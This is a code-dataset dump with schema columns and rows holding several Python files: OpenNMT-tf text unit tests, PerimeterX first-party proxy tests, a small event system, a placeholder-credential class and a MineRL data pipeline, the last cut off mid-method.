hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
366122abcb50b723473f045b548942945acdfd8c
| 3,633
|
py
|
Python
|
opennmt/tests/text_test.py
|
gcervantes8/OpenNMT-tf
|
8cfe999c7b71f8d10caa6fe2af80cdf81d2b8c90
|
[
"MIT"
] | 1,363
|
2017-11-02T14:00:04.000Z
|
2022-03-25T15:21:50.000Z
|
opennmt/tests/text_test.py
|
gcervantes8/OpenNMT-tf
|
8cfe999c7b71f8d10caa6fe2af80cdf81d2b8c90
|
[
"MIT"
] | 455
|
2017-11-02T13:23:07.000Z
|
2022-03-23T08:45:30.000Z
|
opennmt/tests/text_test.py
|
gcervantes8/OpenNMT-tf
|
8cfe999c7b71f8d10caa6fe2af80cdf81d2b8c90
|
[
"MIT"
] | 429
|
2017-11-02T17:14:33.000Z
|
2022-02-26T12:00:39.000Z
|
import tensorflow as tf
from parameterized import parameterized
from opennmt.data import text
class TextTest(tf.test.TestCase):
    """Tests for the token/character/word helpers in ``opennmt.data.text``."""

    def _testTokensToChars(self, tokens, expected_chars):
        # tokens_to_chars returns tf.string tensors (bytes), so convert the
        # str expectations to bytes before comparing.
        expected_chars = tf.nest.map_structure(tf.compat.as_bytes, expected_chars)
        chars = text.tokens_to_chars(tf.constant(tokens, dtype=tf.string))
        self.assertListEqual(chars.to_list(), expected_chars)

    def testTokensToCharsEmpty(self):
        # Edge case: no tokens at all.
        self._testTokensToChars([], [])

    def testTokensToCharsSingle(self):
        self._testTokensToChars(["Hello"], [["H", "e", "l", "l", "o"]])

    def testTokensToCharsMixed(self):
        # Includes multi-byte (CJK) characters to exercise Unicode-aware splitting.
        self._testTokensToChars(
            ["Just", "a", "测试"], [["J", "u", "s", "t"], ["a"], ["测", "试"]]
        )

    @parameterized.expand(
        [
            [["a■", "b", "c■", "d", "■e"], [["a■", "b"], ["c■", "d", "■e"]]],
            [
                ["a", "■", "b", "c■", "d", "■", "e"],
                [["a", "■", "b"], ["c■", "d", "■", "e"]],
            ],
        ]
    )
    def testToWordsWithJoiner(self, tokens, expected):
        # '■' acts as the joiner marker here (presumably the default
        # subword_token of tokens_to_words — confirm against opennmt.data.text).
        expected = tf.nest.map_structure(tf.compat.as_bytes, expected)
        tokens = tf.constant(tokens)
        words = text.tokens_to_words(tokens)
        self.assertAllEqual(words.to_list(), expected)

    @parameterized.expand(
        [
            [["▁a", "b", "▁c", "d", "e"], [["▁a", "b"], ["▁c", "d", "e"]]],
            [
                ["▁", "a", "b", "▁", "c", "d", "e"],
                [["▁", "a", "b"], ["▁", "c", "d", "e"]],
            ],
            [["a▁", "b", "c▁", "d", "e"], [["a▁"], ["b", "c▁"], ["d", "e"]]],
            [
                ["a", "▁b▁", "c", "d", "▁", "e"],
                [["a"], ["▁b▁"], ["c", "d"], ["▁", "e"]],
            ],
        ]
    )
    def testToWordsWithSpacer(self, tokens, expected):
        # '▁' is used in spacer mode (is_spacer=True): it marks word boundaries
        # rather than joining subwords.
        expected = tf.nest.map_structure(tf.compat.as_bytes, expected)
        tokens = tf.constant(tokens)
        words = text.tokens_to_words(tokens, subword_token="▁", is_spacer=True)
        self.assertAllEqual(words.to_list(), expected)

    def _testPharaohAlignments(self, line, lengths, expected_matrix):
        # lengths is [source_length, target_length] for the alignment matrix.
        matrix = text.alignment_matrix_from_pharaoh(
            tf.constant(line), lengths[0], lengths[1], dtype=tf.int32
        )
        self.assertListEqual(expected_matrix, self.evaluate(matrix).tolist())

    def testPharaohAlignments(self):
        self._testPharaohAlignments("", [0, 0], [])
        self._testPharaohAlignments("0-0", [1, 1], [[1]])
        self._testPharaohAlignments(
            "0-0 1-1 2-2 3-3",
            [4, 4],
            [[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]],
        )
        self._testPharaohAlignments(
            "0-0 1-1 2-3 3-2",
            [4, 4],
            [[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 1], [0, 0, 1, 0]],
        )
        # One source token may align to multiple target tokens.
        self._testPharaohAlignments("0-0 1-2 1-1", [2, 3], [[1, 0], [0, 1], [0, 1]])
        # Target positions with no alignment yield all-zero rows.
        self._testPharaohAlignments(
            "0-0 1-2 1-1 2-4",
            [3, 5],
            [[1, 0, 0], [0, 1, 0], [0, 1, 0], [0, 0, 0], [0, 0, 1]],
        )

    @parameterized.expand([[True], [False]])
    def testInvalidPharaohAlignments(self, run_as_function):
        # Out-of-range alignment indices must raise both eagerly and when the
        # function is wrapped in tf.function.
        func = text.alignment_matrix_from_pharaoh
        if run_as_function:
            func = tf.function(func)
        with self.assertRaisesRegex(tf.errors.InvalidArgumentError, "source"):
            func(tf.constant("0-0 1-1 2-3 3-2"), 2, 4)
        with self.assertRaisesRegex(tf.errors.InvalidArgumentError, "target"):
            func(tf.constant("0-0 1-2 1-1 2-4"), 3, 4)
# Allow running this test module directly as a script.
if __name__ == "__main__":
    tf.test.main()
| 36.33
| 84
| 0.496009
| 3,556
| 0.960302
| 0
| 0
| 1,853
| 0.500405
| 0
| 0
| 490
| 0.132325
|
3661e55cade9d0047ddb0c329454134c08c3a612
| 4,277
|
py
|
Python
|
test/test_px_proxy.py
|
wizzard/perimeterx-python-3-wsgi
|
03aded2c868dda3ad198c1f3ee944c775557d818
|
[
"MIT"
] | 1
|
2021-11-06T16:47:51.000Z
|
2021-11-06T16:47:51.000Z
|
test/test_px_proxy.py
|
wizzard/perimeterx-python-3-wsgi
|
03aded2c868dda3ad198c1f3ee944c775557d818
|
[
"MIT"
] | 1
|
2020-08-31T10:50:25.000Z
|
2020-08-31T10:50:25.000Z
|
test/test_px_proxy.py
|
wizzard/perimeterx-python-3-wsgi
|
03aded2c868dda3ad198c1f3ee944c775557d818
|
[
"MIT"
] | 4
|
2020-04-01T10:37:09.000Z
|
2020-12-03T12:34:13.000Z
|
import unittest
import requests_mock
from werkzeug.test import EnvironBuilder
from werkzeug.wrappers import Request
from perimeterx import px_constants
from perimeterx.px_config import PxConfig
from perimeterx.px_context import PxContext
from perimeterx.px_proxy import PxProxy
class Test_PXProxy(unittest.TestCase):
    """Tests for PxProxy: first-party route matching and the reverse-proxied
    requests for the client script, the captcha script, and xhr collector calls."""

    @classmethod
    def setUpClass(cls):
        # One shared config and request-header set for every test; the fixed
        # 127.0.0.1 address makes the forwarded-for headers on the proxied
        # requests predictable.
        cls.config = PxConfig({'app_id': 'PXfake_app_id'})
        cls.headers = {'X-FORWARDED-FOR': '127.0.0.1',
                       'remote-addr': '127.0.0.1',
                       'content_length': '100'}

    def test_should_reverse_request(self):
        builder = EnvironBuilder(headers=self.headers, path='/fake_app_id/init.js')
        env = builder.get_environ()
        request = Request(env)
        context = PxContext(request, self.config)
        px_proxy = PxProxy(self.config)
        # Repeated on purpose: the routing decision should be stable across calls.
        should_reverse = px_proxy.should_reverse_request(context.uri)
        self.assertTrue(should_reverse)
        should_reverse = px_proxy.should_reverse_request(context.uri)
        self.assertTrue(should_reverse)
        should_reverse = px_proxy.should_reverse_request(context.uri)
        self.assertTrue(should_reverse)

    @requests_mock.mock()
    def test_send_reverse_client_request(self, mock):
        # The proxy should fetch the client JS from the PerimeterX host with
        # first-party headers attached and return the body unchanged.
        content = 'client js content'
        builder = EnvironBuilder(headers=self.headers, path='/fake_app_id/init.js')
        env = builder.get_environ()
        request = Request(env)
        context = PxContext(request, self.config)
        headers = {'host': px_constants.CLIENT_HOST,
                   px_constants.FIRST_PARTY_HEADER: '1',
                   px_constants.ENFORCER_TRUE_IP_HEADER: context.ip,
                   px_constants.FIRST_PARTY_FORWARDED_FOR: '127.0.0.1'}
        # request_headers= makes requests_mock also verify the outgoing headers.
        mock.get(url='https://client.perimeterx.net/PXfake_app_id/main.min.js', text=content, request_headers=headers,
                 status_code=200, reason='OK')
        px_proxy = PxProxy(self.config)
        status, headers, body = px_proxy.send_reverse_client_request(config=self.config, ctx=context)
        self.assertEqual(content, body.decode("utf-8"))

    @requests_mock.mock()
    def test_send_reverse_captcha_request(self, mock):
        # Same flow for the captcha script; the query string must be forwarded intact.
        content = 'captcha js content'
        builder = EnvironBuilder(headers=self.headers, path='/fake_app_id/captcha/captcha.js', query_string='a=c&u=cfe74220-f484-11e8-9b14-d7280325a290&v=0701bb80-f482-11e8-8a31-a37cf9620569&m=0')
        env = builder.get_environ()
        request = Request(env)
        context = PxContext(request, self.config)
        headers = {'host': px_constants.CAPTCHA_HOST,
                   px_constants.FIRST_PARTY_HEADER: '1',
                   px_constants.ENFORCER_TRUE_IP_HEADER: context.ip,
                   px_constants.FIRST_PARTY_FORWARDED_FOR: '127.0.0.1'}
        mock.get(
            url='https://captcha.px-cdn.net/PXfake_app_id/captcha.js?a=c&u=cfe74220-f484-11e8-9b14-d7280325a290&v=0701bb80-f482-11e8-8a31-a37cf9620569&m=0',
            text=content, request_headers=headers, status_code=200, reason='OK')
        px_proxy = PxProxy(self.config)
        status, headers, body = px_proxy.send_reverse_captcha_request(config=self.config, ctx=context)
        self.assertEqual(content, body.decode("utf-8"))

    @requests_mock.mock()
    def test_send_reverse_xhr_request(self, mock):
        # POSTed xhr payloads go to the per-app collector host with the request
        # body passed through unchanged.
        content = 'xhr content'
        builder = EnvironBuilder(headers=self.headers, path='/fake_app_id/xhr/api/v1/collector', method='POST')
        env = builder.get_environ()
        request = Request(env)
        context = PxContext(request, self.config)
        headers = {'host': self.config.collector_host,
                   px_constants.FIRST_PARTY_HEADER: '1',
                   px_constants.ENFORCER_TRUE_IP_HEADER: context.ip,
                   px_constants.FIRST_PARTY_FORWARDED_FOR: '127.0.0.1'}
        mock.post(url='https://collector-pxfake_app_id.perimeterx.net/api/v1/collector', text=content,
                  request_headers=headers, status_code=200, reason='OK')
        px_proxy = PxProxy(self.config)
        status, headers, body = px_proxy.send_reverse_xhr_request(config=self.config, ctx=context, body=content)
        self.assertEqual(content, body.decode("utf-8"))
| 45.989247
| 208
| 0.676876
| 3,994
| 0.933832
| 0
| 0
| 3,314
| 0.774842
| 0
| 0
| 731
| 0.170914
|
36625b8ef7dfda999b8814af3148b3e2460eb4ae
| 1,683
|
py
|
Python
|
PI/Events/Event.py
|
HotShot0901/PI
|
7e6fd0f68b4222e09ea825f27709ec5b1e51e928
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"bzip2-1.0.6",
"BSD-3-Clause"
] | null | null | null |
PI/Events/Event.py
|
HotShot0901/PI
|
7e6fd0f68b4222e09ea825f27709ec5b1e51e928
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"bzip2-1.0.6",
"BSD-3-Clause"
] | null | null | null |
PI/Events/Event.py
|
HotShot0901/PI
|
7e6fd0f68b4222e09ea825f27709ec5b1e51e928
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"bzip2-1.0.6",
"BSD-3-Clause"
] | null | null | null |
def BIT(i: int) -> int:
    """Return an integer whose only set bit is bit *i* (i.e. 1 shifted left by i)."""
    value = 1 << i
    return value
# Equivalent of a C++ enum: sequential integer identifiers, one per event kind.
class EventType:
    Null = 0
    WindowClose = 1
    WindowResize = 2
    WindowFocus = 3
    WindowMoved = 4
    AppTick = 5
    AppUpdate = 6
    AppRender = 7
    KeyPressed = 8
    KeyReleased = 9
    CharInput = 10
    MouseButtonPressed = 11
    MouseButtonReleased = 12
    MouseMoved = 13
    MouseScrolled = 14
# Equivalent of a C++ enum used as a bitmask: each category occupies its own
# bit so a single Event can belong to several categories at once.
class EventCategory:
    Null = 0
    Application = 1 << 0
    Input = 1 << 1
    Keyboard = 1 << 2
    Mouse = 1 << 3
    MouseButton = 1 << 4
class Event:
    """Base class for all events; subclasses override EventType and CategoryFlags."""

    # Set True by a handler to stop further propagation of this event.
    Handled = False

    @property
    def EventType(self) -> int:
        """Identifier from the EventType enum; subclasses override (base yields None)."""
        pass

    @property
    def Name(self) -> str:
        # BUG FIX: previously returned the class object itself (`type(self)`)
        # despite the `-> str` annotation; return the class name string instead.
        return type(self).__name__

    @property
    def CategoryFlags(self) -> int:
        """Bitmask of EventCategory flags; subclasses override (base yields None)."""
        pass

    def ToString(self) -> str:
        # BUG FIX: previously called self.GetName(), which does not exist and
        # raised AttributeError; the intended accessor is the Name property.
        return self.Name

    def IsInCategory(self, category: int) -> bool:
        """Return True if this event's category bitmask includes *category*."""
        return bool(self.CategoryFlags & category)

    def __repr__(self) -> str:
        return self.ToString()
class EventDispatcher:
    """Routes a stored event to a handler function when the event type matches."""

    __slots__ = ("_Event",)

    def __init__(self, event: Event) -> None:
        self._Event = event

    def Dispach(self, func, eventType: int) -> bool:
        """Call *func* with the stored event if its type equals *eventType*.

        Records the handler's return value on the event's Handled flag and
        returns True when dispatched, False otherwise.
        """
        # Guard clause: nothing to do when the type does not match.
        if self._Event.EventType != eventType:
            return False
        self._Event.Handled = func(self._Event)
        return True
| 26.714286
| 87
| 0.541889
| 1,430
| 0.849673
| 0
| 0
| 182
| 0.10814
| 0
| 0
| 200
| 0.118835
|
3662bd8e72712ef2032fb1273a5b29f2780ed323
| 144
|
py
|
Python
|
users.py
|
VinasRibeiro/DownStoriesInsta
|
56c8dc402b50a07db2b207c683e39e045fda83e1
|
[
"MIT"
] | null | null | null |
users.py
|
VinasRibeiro/DownStoriesInsta
|
56c8dc402b50a07db2b207c683e39e045fda83e1
|
[
"MIT"
] | null | null | null |
users.py
|
VinasRibeiro/DownStoriesInsta
|
56c8dc402b50a07db2b207c683e39e045fda83e1
|
[
"MIT"
] | null | null | null |
class Users:
    """Hard-coded account credentials and target URL used by the script."""
    # Placeholder login email/username — replace with a real value before running.
    usernamep = 'your_user_email'
    # Placeholder password — replace before running.
    passwordp = 'your_password'
    # Instagram stories URL of the target profile.
    linkp = 'https://www.instagram.com/stories/cznburak/'
| 18
| 57
| 0.666667
| 137
| 0.951389
| 0
| 0
| 0
| 0
| 0
| 0
| 77
| 0.534722
|
36639a81d680c26726142c2d1b64012956deef78
| 19,831
|
py
|
Python
|
src/minerl/data/data_pipeline.py
|
imatge-upc/pixelcoordEDL
|
353632feed6ac8c93758c1a2a1b7a477e7ff053c
|
[
"MIT"
] | 1
|
2021-06-10T04:03:24.000Z
|
2021-06-10T04:03:24.000Z
|
src/minerl/data/data_pipeline.py
|
imatge-upc/pixelcoordEDL
|
353632feed6ac8c93758c1a2a1b7a477e7ff053c
|
[
"MIT"
] | null | null | null |
src/minerl/data/data_pipeline.py
|
imatge-upc/pixelcoordEDL
|
353632feed6ac8c93758c1a2a1b7a477e7ff053c
|
[
"MIT"
] | null | null | null |
import collections
import functools
import json
import logging
import multiprocessing
import os
import time
from collections import OrderedDict
from queue import PriorityQueue, Empty
from typing import List, Tuple, Any
from itertools import cycle, islice
import minerl.herobraine.env_spec
from minerl.herobraine.hero import spaces
import cv2
import os
import numpy as np
import gym
logger = logging.getLogger(__name__)
from minerl.data.version import assert_version, assert_prefix
import copy
import tqdm
import queue
import minerl.data.util
from minerl.data.util import forever, minibatch_gen
import concurrent
from IPython import embed
# WindowsError only exists on Windows; define a stand-in subclass of OSError on
# other platforms so that `except WindowsError` clauses below remain valid.
if os.name != "nt":
    class WindowsError(OSError):
        pass
def tree_slice(tree, slc):
    """Apply the index/slice *slc* to every leaf of a nested OrderedDict tree,
    preserving the dict structure."""
    # Leaves are anything that is not an OrderedDict; index them directly.
    if not isinstance(tree, OrderedDict):
        return tree[slc]
    return OrderedDict(
        (key, tree_slice(value, slc)) for key, value in tree.items()
    )
class DataPipeline:
    """
    Creates a data pipeline object used to iterate through the MineRL-v0 dataset.
    """

    def __init__(self,
                 data_directory: os.path,
                 environment: str,
                 num_workers: int,
                 worker_batch_size: int,
                 min_size_to_dequeue: int,
                 random_seed=42):
        """
        Sets up a tensorflow dataset to load videos from a given data directory.

        :param data_directory: root directory of the dataset on disk
        :param environment: gym environment id whose registered spec describes the data
        :param num_workers: number of processes in the loading pool
        :param worker_batch_size: number of samples each worker enqueues at a time
        :param min_size_to_dequeue: minimum queue fill before dequeueing
        :param random_seed: seed controlling shuffling (defaults to 42)
        """
        self.seed = random_seed
        self.data_dir = data_directory
        self.environment = environment
        self.number_of_workers = num_workers
        self.worker_batch_size = worker_batch_size
        self.size_to_dequeue = min_size_to_dequeue
        self.processing_pool = multiprocessing.Pool(self.number_of_workers)
        # Look the registered spec up once instead of three separate times.
        registered_spec = gym.envs.registration.spec(self.environment)
        self._env_spec = registered_spec._kwargs['env_spec']
        self._action_space = registered_spec._kwargs['action_space']
        self._observation_space = registered_spec._kwargs['observation_space']

    @property
    def spec(self) -> minerl.herobraine.env_spec.EnvSpec:
        return self._env_spec

    @property
    def action_space(self):
        """
        Returns: action space of current MineRL environment
        """
        return self._action_space

    @property
    def observation_space(self):
        """
        Returns: observation space of current MineRL environment
        """
        return self._observation_space

    def load_data(self, stream_name: str, skip_interval=0, include_metadata=False, video_name='recording.mp4'):
        """Iterates over an individual trajectory named stream_name.

        Args:
            stream_name (str): The stream name desired to be iterated through.
            skip_interval (int, optional): How many slices should be skipped. Defaults to 0.
            include_metadata (bool, optional): Whether or not metadata about the loaded
                trajectory should be included. Defaults to False.
            video_name (str, optional): File name of the video inside the trajectory directory.

        Yields:
            A tuple of (state, player_action, reward_from_action, next_state, is_next_state_terminal).
            These tuples are yielded in order of the episode.
        """
        # A stream name containing '/' is treated as an explicit path.
        if '/' in stream_name:
            file_dir = stream_name
        else:
            file_dir = os.path.join(self.data_dir, stream_name)
        if DataPipeline._is_blacklisted(stream_name):
            raise RuntimeError("This stream is corrupted (and will be removed in the next version of the data!)")
        seq = DataPipeline._load_data_pyfunc(file_dir, -1, None, self.environment, skip_interval=skip_interval,
                                             include_metadata=include_metadata, video_name=video_name)
        if include_metadata:
            observation_seq, action_seq, reward_seq, next_observation_seq, done_seq, meta = seq
        else:
            observation_seq, action_seq, reward_seq, next_observation_seq, done_seq = seq
        # Make a copy of the observation space with 'pov' sorted to the end.
        gym_spec = gym.envs.registration.spec(self.environment)
        target_space = copy.deepcopy(gym_spec._kwargs['observation_space'])
        x = list(target_space.spaces.items())
        # BUG FIX: the original compared with `is not 'pov'` — identity
        # comparison against a string literal is implementation-dependent;
        # use value equality instead.
        target_space.spaces = collections.OrderedDict(
            sorted(x, key=lambda item: item[0] if item[0] != 'pov' else 'z')
        )
        # Now we just need to slice the dict.
        for idx in tqdm.tqdm(range(len(reward_seq))):
            # Wrap in dict
            action_dict = tree_slice(action_seq, idx)
            observation_dict = tree_slice(observation_seq, idx)
            next_observation_dict = tree_slice(next_observation_seq, idx)
            yield_list = [observation_dict, action_dict, reward_seq[idx], next_observation_dict, done_seq[idx]]
            yield yield_list + [meta] if include_metadata else yield_list

    def get_trajectory_names(self):
        """Gets all the trajectory names.

        Returns:
            A list of experiment names found below self.data_dir.
        """
        return [os.path.basename(x) for x in self._get_all_valid_recordings(self.data_dir)]

    ############################
    #     PRIVATE METHODS      #
    ############################

    @staticmethod
    def read_frame(cap):
        """Read one frame from an OpenCV capture, converting BGR -> RGB uint8 in place."""
        try:
            ret, frame = cap.read()
            if ret:
                cv2.cvtColor(frame, code=cv2.COLOR_BGR2RGB, dst=frame)
                frame = np.asarray(np.clip(frame, 0, 255), dtype=np.uint8)
            return ret, frame
        except Exception as err:
            # BUG FIX: pass the exception as a lazy %-argument so it is
            # actually rendered in the log message.
            logger.error("error reading capture device: %s", err)
            raise err

    @staticmethod
    def _roundrobin(*iterables):
        "roundrobin('ABC', 'D', 'EF') --> A D E B F C"
        # Recipe credited to George Sakkis
        pending = len(iterables)
        # BUG FIX: `iter(it).next` is Python 2 syntax and raises
        # AttributeError on Python 3; the bound method is __next__.
        nexts = cycle(iter(it).__next__ for it in iterables)
        while pending:
            try:
                for nxt in nexts:
                    yield nxt()
            except StopIteration:
                pending -= 1
                nexts = cycle(islice(nexts, pending))

    # Todo: Make data pipeline split files per push.
    @staticmethod
    def _load_data_pyfunc(file_dir: str, max_seq_len: int, data_queue, env_str="", skip_interval=0,
                          include_metadata=False, video_name='recording.mp4'):
        """
        Enqueueing mechanism for loading a trajectory from a file onto the data_queue.

        :param file_dir: file path to data directory
        :param skip_interval: Number of time steps to skip between each sample
        :param max_seq_len: Number of time steps in each enqueued batch, or -1 for whole trajectory
        :param data_queue: multiprocessing data queue, or None to return streams directly
        :param include_metadata: whether or not to return an additional tuple containing metadata
        :return: the batches list when data_queue is None, otherwise None
        """
        logger.debug("Loading from file {}".format(file_dir))
        video_path = str(os.path.join(file_dir, video_name))
        numpy_path = str(os.path.join(file_dir, 'rendered.npz'))
        meta_path = str(os.path.join(file_dir, 'metadata.json'))
        try:
            # Start video decompression
            cap = cv2.VideoCapture(video_path)
            # Load numpy file
            state = np.load(numpy_path, allow_pickle=True)
            # Load metadata file
            with open(meta_path) as file:
                meta = json.load(file)
                if 'stream_name' not in meta:
                    meta['stream_name'] = file_dir
            action_dict = collections.OrderedDict([(key, state[key]) for key in state if key.startswith('action$')])
            reward_vec = state['reward']
            info_dict = collections.OrderedDict([(key, state[key]) for key in state if key.startswith('observation$')])

            # Recursively sorts nested dicts
            def recursive_sort(dct):
                for key in list(dct.keys()):
                    if isinstance(dct[key], OrderedDict):
                        dct[key] = recursive_sort(dct[key])
                        dct[key] = OrderedDict(sorted(dct[key].items()))
                return dct

            # Expands '$'-separated flat keys into a nested OrderedDict tree.
            def unflatten(dct, sep='$'):
                out_dict = OrderedDict({})
                for k, v in dct.items():
                    keys = k.split(sep)
                    cur_dict = out_dict
                    for key in keys[:-1]:
                        if key not in cur_dict:
                            cur_dict[key] = OrderedDict({})
                        cur_dict = cur_dict[key]
                    cur_dict[keys[-1]] = v
                # Sort dict recursively
                recursive_sort(out_dict)
                return out_dict

            # There is no action or reward for the terminal state of an episode.
            # Hence in Publish.py we shorten the action and reward vector to reflect this.
            # We know FOR SURE that the last video frame corresponds to the last state (from Universal.json).
            num_states = len(reward_vec) + 1
            max_frame_num = meta['true_video_frame_count']
            frames = []
            frame_num, stop_idx = 0, 0

            # BUG FIX: the original re-opened cv2.VideoCapture(video_path) here
            # without releasing the handle opened above, leaking a file handle
            # per trajectory; the capture above is already at frame 0, so it is
            # reused directly.
            # for _ in range(max_frame_num - num_states):
            #     ret, _ = DataPipeline.read_frame(cap)
            #     frame_num += 1
            #     if not ret:
            #         raise RuntimeError()

            # Rendered Frames
            # Loop through the video and construct frames
            # of observations to be sent via the multiprocessing queue
            # in chunks of worker_batch_size to the batch_iter loop.
            while True:
                ret = True
                start_idx = stop_idx
                # Collect up to worker_batch_size number of frames
                try:
                    # Go until max_seq_len +1 for S_t, A_t, -> R_t, S_{t+1}, D_{t+1}
                    while ret and frame_num < max_frame_num and (len(frames) < max_seq_len + 1 or max_seq_len == -1):
                        ret, frame = DataPipeline.read_frame(cap)
                        frames.append(frame)
                        frame_num += 1
                except Exception as err:
                    logger.error("error reading capture device: %s", err)
                    raise err

                if len(frames) <= 1:
                    break
                if frame_num == max_frame_num:
                    frames[-1] = frames[-2]

                # Next sarsd pair index
                stop_idx = start_idx + len(frames) - 1
                # print('Num frames in batch:', stop_idx - start_idx)

                # Load non-image data from npz
                current_observation_data = OrderedDict()
                action_data = OrderedDict()
                next_observation_data = OrderedDict()
                try:
                    for key in list(info_dict.keys()) + ['observation$pov']:
                        if 'pov' in key:
                            current_observation_data[key] = np.asanyarray(frames[:-1])
                            next_observation_data[key] = np.asanyarray(frames[1:])
                        else:
                            current_observation_data[key] = np.asanyarray(info_dict[key][start_idx:stop_idx])
                            next_observation_data[key] = np.asanyarray(info_dict[key][start_idx + 1:stop_idx + 1])
                    # We are getting (S_t, A_t -> R_t), S_{t+1}, D_{t+1} so there are less actions and rewards
                    for key in action_dict:
                        action_data[key] = np.asanyarray(action_dict[key][start_idx: stop_idx])
                    reward_data = np.asanyarray(reward_vec[start_idx:stop_idx], dtype=np.float32)
                    done_data = [False for _ in range(len(reward_data))]
                    if frame_num == max_frame_num:
                        done_data[-1] = True
                except Exception as err:
                    logger.error("error drawing batch from npz file: %s", err)
                    raise err

                # Unflatten these dictionaries.
                current_observation_data = unflatten(current_observation_data)['observation']
                action_data = unflatten(action_data)['action']
                next_observation_data = unflatten(next_observation_data)['observation']

                # BUG FIX: np.bool was deprecated in NumPy 1.20 and removed in
                # 1.24; the documented replacement for dtype use is plain bool.
                batches = [current_observation_data, action_data, reward_data, next_observation_data,
                           np.array(done_data, dtype=bool)]
                if include_metadata:
                    batches += [meta]

                if data_queue is None:
                    return batches
                else:
                    data_queue.put(batches)
                    logger.debug("Enqueued from file {}".format(file_dir))

                if not ret:
                    break
                else:
                    # Keep the last frame so consecutive chunks overlap by one state.
                    frames = [frames[-1]]
            logger.error("Finished")
            return None
        except WindowsError as e:
            logger.debug("Caught windows error {} - this is expected when closing the data pool".format(e))
            return None
        except FileNotFoundError as e:
            print("File not found!")
            raise e
        except Exception as e:
            logger.error("Exception caught on file \"{}\" by a worker of the data pipeline.".format(file_dir))
            logger.error(repr(e))
            return None

    def batch_iter(self,
                   batch_size: int,
                   seq_len: int,
                   num_epochs: int = -1,
                   preload_buffer_size: int = 2,
                   seed: int = None,
                   include_metadata: bool = False):
        """Returns batches of sequences length SEQ_LEN of the data of size BATCH_SIZE.

        The iterator produces batches sequentially. If an element of a batch reaches the
        end of its trajectory, the next trajectory from the queue replaces it.

        Args:
            batch_size (int): The batch size.
            seq_len (int): The size of sequences to produce.
            num_epochs (int, optional): The number of epochs to iterate over the data. Defaults to -1.
            preload_buffer_size (int, optional): Increase to IMPROVE PERFORMANCE. The data iterator
                uses a queue to prevent blocking, the queue size is the number of trajectories to
                load into the buffer. Adjust based on memory constraints. Defaults to 2.
            seed (int, optional): NOT IMPLEMENTED. Defaults to None.
            include_metadata (bool, optional): Include metadata on the source trajectory. Defaults to False.

        Returns:
            Generator: A generator that yields (sarsd) batches.
        """
        # Todo: seed is not implemented.
        for epoch in (range(num_epochs) if num_epochs > 0 else forever()):
            trajectory_queue = queue.Queue(maxsize=preload_buffer_size)

            def traj_iter():
                # One queue entry is consumed per scheduled job; closes over
                # `jobs`, assigned below before this generator is first pulled.
                for _ in jobs:
                    s, a, r, sp1, d = trajectory_queue.get()
                    yield dict(
                        obs=s,
                        act=a,
                        reward=r,
                        next_obs=sp1,
                        done=d
                    )

            jobs = [(f, -1, None) for f in self._get_all_valid_recordings(self.data_dir)]
            np.random.shuffle(jobs)
            trajectory_loader = minerl.data.util.OrderedJobStreamer(
                job,
                jobs,
                trajectory_queue,
                # executor=concurrent.futures.ThreadPoolExecutor,
                max_workers=preload_buffer_size
            )
            trajectory_loader.start()
            for seg_batch in minibatch_gen(traj_iter(), batch_size=batch_size, nsteps=seq_len):
                yield seg_batch['obs'], seg_batch['act'], seg_batch['reward'], seg_batch['next_obs'], seg_batch['done']
            trajectory_loader.shutdown()

    @staticmethod
    def _is_blacklisted(path):
        """Return True if *path* refers to a known-corrupted stream."""
        for p in [
            'tempting_capers_shapeshifter-14'
        ]:
            if p in path:
                return True
        return False

    @staticmethod
    def _get_all_valid_recordings(path):
        """Recursively collect (shuffled) trajectory directories that contain
        both an .mp4 recording and an .npz data file."""
        directoryList = []

        # return nothing if path is a file
        if os.path.isfile(path):
            return []

        # Skip this file.
        if DataPipeline._is_blacklisted(path):
            return []

        # add dir to directory list if it contains the required files
        if len([f for f in os.listdir(path) if f.endswith('.mp4')]) > 0:
            if len([f for f in os.listdir(path) if f.endswith('.npz')]) > 0:
                assert_prefix(path)
                directoryList.append(path)
        for d in os.listdir(path):
            new_path = os.path.join(path, d)
            if os.path.isdir(new_path):
                directoryList += DataPipeline._get_all_valid_recordings(new_path)
        directoryList = np.array(directoryList)
        np.random.shuffle(directoryList)
        return directoryList.tolist()

    ###
    # DEPRECATED API
    ###
    def seq_iter(self, num_epochs=-1, max_sequence_len=32, queue_size=None, seed=None, include_metadata=False):
        """DEPRECATED METHOD FOR SAMPLING DATA FROM THE MINERL DATASET.

        This function is now :code:`DataPipeline.batch_iter()`
        """
        raise DeprecationWarning(
